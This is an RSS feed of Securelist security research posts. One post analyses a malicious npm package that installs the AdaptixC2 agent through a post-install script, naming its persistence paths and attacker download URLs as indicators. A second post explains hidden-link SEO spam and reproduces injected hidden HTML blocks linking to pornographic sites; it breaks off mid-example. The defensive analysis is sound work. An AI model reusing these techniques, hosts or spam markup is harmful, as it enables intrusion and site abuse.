![[Valid RSS]](images/valid-rss-rogers.png "Valid RSS")
This is a valid RSS feed.
This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.
line 55, column 0: (75 occurrences) [help]
<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
line 55, column 0: (72 occurrences) [help]
<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
<div id="attachment_117785" style="width: 1486px" class="wp-caption aligncen ...
line 59, column 0: (38 occurrences) [help]
<div id="attachment_117785" style="width: 1486px" class="wp-caption aligncen ...
line 59, column 0: (65 occurrences) [help]
<div id="attachment_117785" style="width: 1486px" class="wp-caption aligncen ...
line 158, column 0: (41 occurrences) [help]
<span id="urvanov-syntax-highlighter-68f254acc263a365369805" class="urvan ...
]]></content:encoded>
^
line 663, column 0: (7 occurrences) [help]
<div class="js-infogram-embed" data-id="_/PYFxzOySORx2YCuG6lUv" data-type="i ...
line 663, column 0: (7 occurrences) [help]
<div class="js-infogram-embed" data-id="_/PYFxzOySORx2YCuG6lUv" data-type="i ...
line 663, column 0: (7 occurrences) [help]
<div class="js-infogram-embed" data-id="_/PYFxzOySORx2YCuG6lUv" data-type="i ...
line 776, column 0: (3 occurrences) [help]
<p><script data-b24-form="inline/1808/7dlezh" data-skip-moving="true">
<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" > <channel> <title>Securelist</title> <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" /> <link>https://securelist.com</link> <description></description> <lastBuildDate>Fri, 17 Oct 2025 10:01:45 +0000</lastBuildDate> <language>en-US</language> <sy:updatePeriod> hourly </sy:updatePeriod> <sy:updateFrequency> 1 </sy:updateFrequency> <generator>https://wordpress.org/?v=6.8.3</generator> <image> <url>https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png</url> <title>Securelist</title> <link>https://securelist.com</link> <width>32</width> <height>32</height></image> <item> <title>Post-exploitation framework now also delivered via npm</title> <link>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/</link> <comments>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/#respond</comments> <dc:creator><![CDATA[Vladimir Gursky, Artem Ushkov]]></dc:creator> <pubDate>Fri, 17 Oct 2025 10:00:33 +0000</pubDate> <category><![CDATA[Incidents]]></category> <category><![CDATA[Malware descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Microsoft Windows]]></category> <category><![CDATA[Apple MacOS]]></category> <category><![CDATA[x64]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[ARM]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Supply-chain attack]]></category> <category><![CDATA[Open source]]></category><category><![CDATA[Windows malware]]></category> <category><![CDATA[Unix and macOS malware]]></category> <category><![CDATA[Web threats]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117784</guid> <description><![CDATA[The npm registry contains a malicious package that downloads the AdaptixC2 agent onto victims' devices, Kaspersky experts have found. The threat targets Windows, Linux, and macOS.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="incident-description">Incident description</h2><p>The first version of the AdaptixC2 post-exploitation framework, which can be considered an alternative to the well-known Cobalt Strike, was made publicly available in early 2025. In spring of 2025, the framework was <a href="https://x.com/Unit42_Intel/status/1925206262184026156" target="_blank" rel="noopener">first observed</a> being used for malicious means.</p><p>In October 2025, Kaspersky experts found that the npm ecosystem contained a malicious package with a fairly convincing name: <code>https-proxy-utils</code>. It was posing as a utility for using proxies within projects. At the time of this post, the package had already been taken down.</p><p>The name of the package closely resembles popular legitimate packages: <code>http-proxy-agent</code>, which has approximately 70 million weekly downloads, and <code>https-proxy-agent</code> with 90 million downloads respectively. Furthermore, the advertised proxy-related functionality was cloned from another popular legitimate package <code>proxy-from-env</code>, which boasts 50 million weekly downloads. However, the threat actor injected a post-install script into <code>https-proxy-utils</code>, which downloads and executes a payload containing the AdaptixC2 agent.</p><div id="attachment_117785" style="width: 1486px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-117785" class="size-full wp-image-117785" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png" alt="Metadata for the malicious (left) and legitimate (right) packages" width="1476" height="518" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1.png 1476w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-768x270.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-997x350.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-740x260.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-798x280.png 798w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155133/adaptixc2-agent-found1-800x281.png 800w" sizes="(max-width: 1476px) 100vw, 1476px" /></a><p id="caption-attachment-117785" class="wp-caption-text">Metadata for the malicious (left) and legitimate (right) packages</p></div><h2 id="os-specific-adaptation">OS-specific adaptation</h2><p>The script includes various payload delivery methods for different operating systems. The package includes loading mechanisms for Windows, Linux, and macOS. In each OS, it uses specific techniques involving system or user directories to load and launch the implant.</p><p>In Windows, the AdaptixC2 agent is dropped as a DLL file into the system directory <code>C:\Windows\Tasks</code>. It is then executed via <a href="https://attack.mitre.org/techniques/T1574/001/" target="_blank" rel="noopener">DLL sideloading</a>. The JS script copies the legitimate <code>msdtc.exe</code> file to the same directory and executes it, thus loading the malicious DLL.</p><div id="attachment_117786" style="width: 688px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-117786" class="size-full wp-image-117786" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png" alt="Deobfuscated Windows-specific code for loading AdaptixC2" width="678" height="569" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2.png 678w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-300x252.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-417x350.png 417w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155221/adaptixc2-agent-found2-334x280.png 334w" sizes="(max-width: 678px) 100vw, 678px" /></a><p id="caption-attachment-117786" class="wp-caption-text">Deobfuscated Windows-specific code for loading AdaptixC2</p></div><p>In macOS, the script downloads the payload as an executable file into the user’s autorun directory: <code>Library/LaunchAgents</code>. The <code>postinstall.js</code> script also drops a plist autorun configuration file into this directory. Before downloading AdaptixC2, the script checks the target architecture (x64 or ARM) and fetches the appropriate payload variant.</p><div id="attachment_117787" style="width: 633px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-117787" class="size-full wp-image-117787" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png" alt="Deobfuscated macOS-specific code for loading AdaptixC2" width="623" height="726" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3.png 623w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-257x300.png 257w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-300x350.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155305/adaptixc2-agent-found3-240x280.png 240w" sizes="(max-width: 623px) 100vw, 623px" /></a><p id="caption-attachment-117787" class="wp-caption-text">Deobfuscated macOS-specific code for loading AdaptixC2</p></div><p>In Linux, the framework’s agent is downloaded into the temporary directory <code>/tmp/.fonts-unix</code>. The script delivers a binary file tailored to the specific architecture (x64 or ARM) and then assigns it execute permissions.</p><div id="attachment_117788" style="width: 889px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-117788" class="size-full wp-image-117788" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png" alt="Deobfuscated Linux-specific code for loading AdaptixC2" width="879" height="549" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4.png 879w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-300x187.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-768x480.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-560x350.png 560w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-740x462.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-448x280.png 448w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16155351/adaptixc2-agent-found4-800x500.png 800w" sizes="auto, (max-width: 879px) 100vw, 879px" /></a><p id="caption-attachment-117788" class="wp-caption-text">Deobfuscated Linux-specific code for loading AdaptixC2</p></div><p>Once the AdaptixC2 framework agent is deployed on the victim’s device, the attacker gains capabilities for remote access, command execution, file and process management, and various methods for achieving persistence. This both allows the attacker to maintain consistent access and enables them to conduct network reconnaissance and deploy subsequent stages of the attack.</p><h2 id="conclusion">Conclusion</h2><p>This is not the first attack targeting the npm registry in recent memory. A month ago, similar infection methods utilizing a post-install script were employed in the <a href="https://securelist.com/shai-hulud-worm-infects-500-npm-packages-in-a-supply-chain-attack/117547/" target="_blank" rel="noopener">high-profile incident</a> involving the Shai-Hulud worm, which infected more than 500 packages<strong>. </strong>The AdaptixC2 incident clearly demonstrates the growing trend of abusing open-source software ecosystems, like npm, as an attack vector. Threat actors are <a href="https://securelist.com/tag/supply-chain-attack/" target="_blank" rel="noopener">increasingly exploiting the trusted open-source supply chain</a> to distribute post-exploitation framework agents and other forms of malware. Users and organizations involved in development or using open-source software from ecosystems like npm in their products are susceptible to this threat type.</p><p>To stay safe, be vigilant when installing open-source modules: verify the exact name of the package you are downloading, and more thoroughly vet unpopular and new repositories. When using popular modules, it is critical to monitor <a href="https://www.kaspersky.com/open-source-feed?icid=gl_sl_post-link-open-source-feed_sm-team_cc8b77692a32ebbc" target="_blank" rel="noopener">frequently updated feeds on compromised packages and libraries</a>.</p><h2 id="indicators-of-compromise">Indicators of compromise</h2><p><strong>Package name</strong><br />https-proxy-utils</p><p><strong>Hashes</strong><br /><a href="https://opentip.kaspersky.com/dfbc0606e16a89d980c9b674385b448e/results?icid=gl_sl_post-link-opentip_sm-team_9a4fb45257066833&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">DFBC0606E16A89D980C9B674385B448E</a> – package hash<br /><a href="https://opentip.kaspersky.com/b8e27a88730b124868c1390f3bc42709/results?icid=gl_sl_post-link-opentip_sm-team_c62dd3c8ffe2ed1b&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">B8E27A88730B124868C1390F3BC42709</a><br /><a href="https://opentip.kaspersky.com/669bdbef9e92c3526302ca37dc48d21f/results?icid=gl_sl_post-link-opentip_sm-team_972755ad1f67ef7f&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">669BDBEF9E92C3526302CA37DC48D21F</a><br /><a href="https://opentip.kaspersky.com/edac632c9b9ff2a2da0eacaab63627f4/results?icid=gl_sl_post-link-opentip_sm-team_cf39ec80bf7cdde8&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">EDAC632C9B9FF2A2DA0EACAAB63627F4</a><br /><a href="https://opentip.kaspersky.com/764c9e6b6f38df11dc752cb071ae26f9/results?icid=gl_sl_post-link-opentip_sm-team_375c37e00fb6f5e7&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">764C9E6B6F38DF11DC752CB071AE26F9</a><br /><a href="https://opentip.kaspersky.com/04931b7dfd123e6026b460d87d842897/results?icid=gl_sl_post-link-opentip_sm-team_76f48f8715dd6b3c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">04931B7DFD123E6026B460D87D842897</a></p><p><strong>Network indicators</strong><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2fsys%2fupdate/?icid=gl_sl_post-link-opentip_sm-team_67aaee30ceb5fe92&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/sys/update</a><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacos_update_arm/?icid=gl_sl_post-link-opentip_sm-team_87ea43b039efcf34&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macos_update_arm</a><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacos_update_x64/?icid=gl_sl_post-link-opentip_sm-team_0bdec936559c877d&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macos_update_x64</a><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2fmacosupdate%5b.%5dplist/?icid=gl_sl_post-link-opentip_sm-team_423c8ff0ce467cbf&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/macosUpdate[.]plist</a><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2flinux_update_x64/?icid=gl_sl_post-link-opentip_sm-team_9b4e0d2a0cdfec13&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/linux_update_x64</a><br /><a href="https://opentip.kaspersky.com/cloudcenter.top%2flinux_update_arm/?icid=gl_sl_post-link-opentip_sm-team_16b93246956b263a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">cloudcenter[.]top/linux_update_arm</a></p>]]></content:encoded> <wfw:commentRss>https://securelist.com/adaptixc2-agent-found-in-an-npm-package/117784/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image.jpg" width="2000" height="1000"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-1024x512.jpg" width="1024" height="512"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-300x150.jpg" width="300" height="150"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/17081221/adaptix-featured-image-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>SEO spam and hidden links: how to protect your website and your reputation</title> <link>https://securelist.com/seo-spam-hidden-links/117782/</link> <comments>https://securelist.com/seo-spam-hidden-links/117782/#respond</comments> <dc:creator><![CDATA[Anna Larkina]]></dc:creator> <pubDate>Fri, 17 Oct 2025 07:00:55 +0000</pubDate> <category><![CDATA[Publications]]></category> <category><![CDATA[Website Hacks]]></category> <category><![CDATA[Content Filtering]]></category> <category><![CDATA[XSS]]></category> <category><![CDATA[Vulnerabilities]]></category> <category><![CDATA[SQL injection]]></category> <category><![CDATA[SEO]]></category> <category><![CDATA[Black Hat SEO]]></category><category><![CDATA[Web threats]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=117782</guid> <description><![CDATA[Are you seeing your website traffic drop, and security systems blocking it for pornographic content that is not there? Hidden links, a type of SEO spam, could be the cause.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/10/16210132/SL-seo-spam-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>When analyzing the content of websites in an attempt to determine what category it belongs to, we sometimes get an utterly unexpected result. It could be the official page of a metal structures manufacturer or online flower shop, or, say, a law firm website, with completely neutral content, but our solutions would place it squarely in the “Adult content” category. On the surface, it is completely unclear how our systems arrived at that verdict, but one look at the content categorization engine’s page analysis log clears it up.</p><h2 id="invisible-html-block-or-seo-spam">Invisible HTML block, or SEO spam</h2><p>The website falls into the questionable category because it contains an HTML block with links to third-party sites, invisible to regular users. These sites typically host content of a certain kind – which, in our experience, is most often pornographic or gambling materials – and in the hidden block, you will find relevant keywords along with the links. These practices are a type of Black Hat SEO, or SEO spam: the manipulation of website search rankings in violation of ethical search engine optimization (SEO) principles. Although there are many techniques that attackers use to raise or lower websites in search engine rankings, we have encountered hidden blocks more frequently lately, so this is what this post focuses on.</p><p>Website owners rarely suspect a problem until they face obvious negative consequences, such as a sharp drop in traffic, warnings from search engines, or complaints from visitors. Those who use Kaspersky solutions may see their sites blocked due to being categorized as prohibited, a sign that something is wrong with them. Our engine detects both links and their descriptions that are present in a block like that.</p><h2 id="how-hidden-links-work">How hidden links work</h2><p>Hyperlinks that are invisible to regular users but still can be scanned by various analytical systems, such as search engines or our web categorization engine, are known as “hidden links”. They are often used for scams, inflating website rankings (positions in search results), or pushing down the ranking of a victim website.</p><p>To understand how this works, let us look at how today’s SEO functions in the first place. A series of algorithms is responsible for ranking websites in search results, such as those served by Google. The oldest and most relevant one to this article is known as <a href="https://en.wikipedia.org/wiki/PageRank" target="_blank" rel="noopener">PageRank</a>. The PageRank metric, or weight in the context of this algorithm, is a numerical value that determines the importance of a specific page. The higher the number of links from other websites pointing to a page, and the greater those websites’ own weights, the higher the page’s PageRank.</p><p>So, to boost their own website’s ranking in search results, the malicious actor places hidden links to it on the victim website. The higher the victim website’s PageRank, the more attractive it is to the attacker. High-traffic platforms like blogs or forums are of particular interest to them.</p><p>However, PageRank is no longer the only method search engines use to measure a website’s value. Google, for example, also applies other algorithms, such as the artificial intelligence-based <a href="https://en.wikipedia.org/wiki/RankBrain" target="_blank" rel="noopener">RankBrain</a> or the <a href="https://en.wikipedia.org/wiki/BERT_(language_model)" target="_blank" rel="noopener">BERT language model</a>. These algorithms use more sophisticated metrics, such as <a href="https://en.wikipedia.org/wiki/Domain_authority" target="_blank" rel="noopener">Domain Authority</a> (that is, how much authority the website has on the subject the user is asking about), link quality, and context. Placing links on a website with a high PageRank can still be beneficial, but this tactic has a severely limited effect due to advanced algorithms and filters aimed at demoting sites that break the search engine’s rules. Examples of these filters are as follows:</p><ul><li><a href="https://en.wikipedia.org/wiki/Google_Penguin" target="_blank" rel="noopener">Google Penguin</a>, which identifies and penalizes websites that use poor-quality or manipulative links, including hidden ones, to boost their own rankings. When links like these are detected, their weight can be zeroed out, and the ranking may be lowered for both sites: the victim and the spam website.</li><li><a href="https://en.wikipedia.org/wiki/Google_Panda" target="_blank" rel="noopener">Google Panda</a>, which evaluates content quality. If the website has a high PageRank, but the content is of low quality, duplicated, auto-generated, or otherwise substandard, the site may be demoted.</li><li><a href="https://spambrain.com/" target="_blank" rel="noopener">Google SpamBrain</a>, which uses machine learning to analyze HTML markup, page layouts, and so forth to identify manipulative patterns. This algorithm is integrated into Google Penguin.</li></ul><h2 id="what-a-black-hat-seo-block-looks-like-in-a-pages-html-markup">What a Black Hat SEO block looks like in a page’s HTML markup</h2><p>Let us look at some real examples of hidden blocks we have seen on legitimate websites and determine the attributes by which these blocks can be identified.</p><h3 id="example-1">Example 1</h3><pre class="urvanov-syntax-highlighter-plain-tag"><div style="display: none;">افلام سكس اعتصاب <a href="https://www.azcorts.com/" rel="dofollow" target="_self">azcorts.com</a> قنوات جنسيةfree indian porn com <a href="https://porngun.mobi" target="_self">porngun.mobi</a> xharmaster石原莉紅 <a href="https://javclips.mobi/" target="_blank" title="javclips.mobi">javclips.mobi</a> ちっぱいbank porn <a href="https://pimpmpegs.net" target="_self" title="pimpmpegs.net free video porn">pimpmpegs.net</a> wwwpormsalamat lyrics tagalog <a href="https://www.teleseryeone.com/" target="_blank" title="teleseryeone.com sandro marcos alexa miro">teleseryeone.com</a> play desi</div><div style="display: none;">كسى بيوجعنى <a href="https://www.sexdejt.org/" rel="dofollow">sexdejt.org</a> سكس سانىindian sex video bp <a href="https://directorio-porno.com/" rel="dofollow" target="_self" title="directorio-porno.com">directorio-porno.com</a> xvideos indian pussyswara bhaskar porn <a href="https://greenporn.mobi" title="greenporn.mobi lesbian porn hq">greenporn.mobi</a> kannada sexy videobp sex full <a href="https://tubepornmix.info" target="_blank" title="tubepornmix.info aloha tube porn video">tubepornmix.info</a> lily sexpinayflix pamasahe <a href="https://www.gmateleserye.com/" rel="dofollow" target="_blank">gmateleserye.com</a> family feud november 17</div><div style="display: none;">sunny leone ki bp download <a href="https://eroebony.info" target="_self" title="eroebony.info">eroebony.info</a> hansika xvideosموقع سكس ايطالى <a href="https://bibshe.com/" target="_self" title="bibshe.com سكس العادة السرية">bibshe.com</a> صور احلى كسraja rani coupon result <a href="https://booketube.mobi" rel="dofollow">booketube.mobi</a> exercise sex videosindianbadwap <a href="https://likeporn.mobi" rel="dofollow" target="_blank" title="likeporn.mobi free hd porn">likeporn.mobi</a> rabi pirzada nude videomarathi porn vidio <a href="https://rajwap.biz" rel="dofollow" target="_blank" title="rajwap.biz">rajwap.biz</a> www.livesex.com</div></pre>This example utilizes a simple CSS style, <span id="urvanov-syntax-highlighter-68f254acc263a365369805" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-e">div </span><span class="crayon-v">style</span><span class="crayon-o">=</span><span class="crayon-s">"display: none;"</span><span class="crayon-o">></span></span></span>. This is one of the most basic and widely known methods for concealing content; the parameter <span id="urvanov-syntax-highlighter-68f254acc263c130312974" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span></span></span>; stands for “do not display”. We also see that each invisible <span id="urvanov-syntax-highlighter-68f254acc263d555824858" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-v">div</span><span class="crayon-o">></span></span></span> section contains a set of links to low-quality pornographic websites along with their keyword-stuffed descriptions. This clearly indicates spam, as the website where we found this block has no relation whatsoever to the type of content being linked to.</p><p>Another sign of Black Hat SEO in the example is the attribute <span id="urvanov-syntax-highlighter-68f254acc263e586918587" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span>. This instructs search engines that the link carries link juice, meaning it passes weight. Spammers intentionally set this attribute to transfer authority from the victim website to the ones they are promoting. In standard practice, webmasters may, conversely, use <span id="urvanov-syntax-highlighter-68f254acc2640909198748" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"nofollow"</span></span></span>, which signifies that the presence of the link on the site should not influence the ranking of the website where it leads.</p><p>Thus, the combination of a hidden block ( <span id="urvanov-syntax-highlighter-68f254acc2641719304235" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">display</span><span class="crayon-o">:</span><span class="crayon-h"> </span><span class="crayon-v">none</span><span class="crayon-sy">;</span></span></span>) and a set of external pornographic (in this instance) links with the <span id="urvanov-syntax-highlighter-68f254acc2642585875620" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-v">rel</span><span class="crayon-o">=</span><span class="crayon-s">"dofollow"</span></span></span> attribute unequivocally point to a SEO spam injection.</p><p>Note that all <span id="urvanov-syntax-highlighter-68f254acc2643806833762" class="urvanov-syntax-highlighter-syntax urvanov-syntax-highlighter-syntax-inline crayon-theme-classic crayon-theme-classic-inline urvanov-syntax-highlighter-font-monaco" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important;"><span class="crayon-pre urvanov-syntax-highlighter-code" style="font-size: 12px !important; line-height: 15px !important;font-size: 12px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><span class="crayon-o"><</span><span class="crayon-v">div</span><span class="crayon-o">></span></span></span> sections are concentrated in one spot, at the end of the page, rather than scattered throughout the page code. This block demonstrates a classic Black Hat SEO approach.</p><h3 id="example-2">Example 2</h3><pre class="urvanov-syntax-highlighter-plain-tag"><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">سكس انجليز <a href="https://wfporn.com/" target="_self" title="wfporn.com افلام سحاق مترجم">wfporn.com</a> سكس كلاسيك مترجم</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">فيلم سكس <a href="https://www.keep-porn.com/" rel="dofollow" target="_blank">keep-porn.com</a> سكس هندى اغتصاب</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">desi nude tumbler <a href="https://www.desixxxv.net" title="desixxxv.net free hd porn video">desixxxv.net</a> kanpur sexy video</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">www wap sex video com <a href="https://pornorado.mobi" target="_self">pornorado.mobi</a> sexy film video mp4</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">mom yes porn please <a href="https://www.movsmo.net/" rel="dofollow" title="movsmo.net">movsmo.net</a> yes porn please brazzers</div><div style="overflow: auto; position: absolute; height: 0pt; width: 0pt;">xxx download hd <a href="https://fuxee.mobi" title="fuxee.mobi">fuxee.mobi</a> fat woman 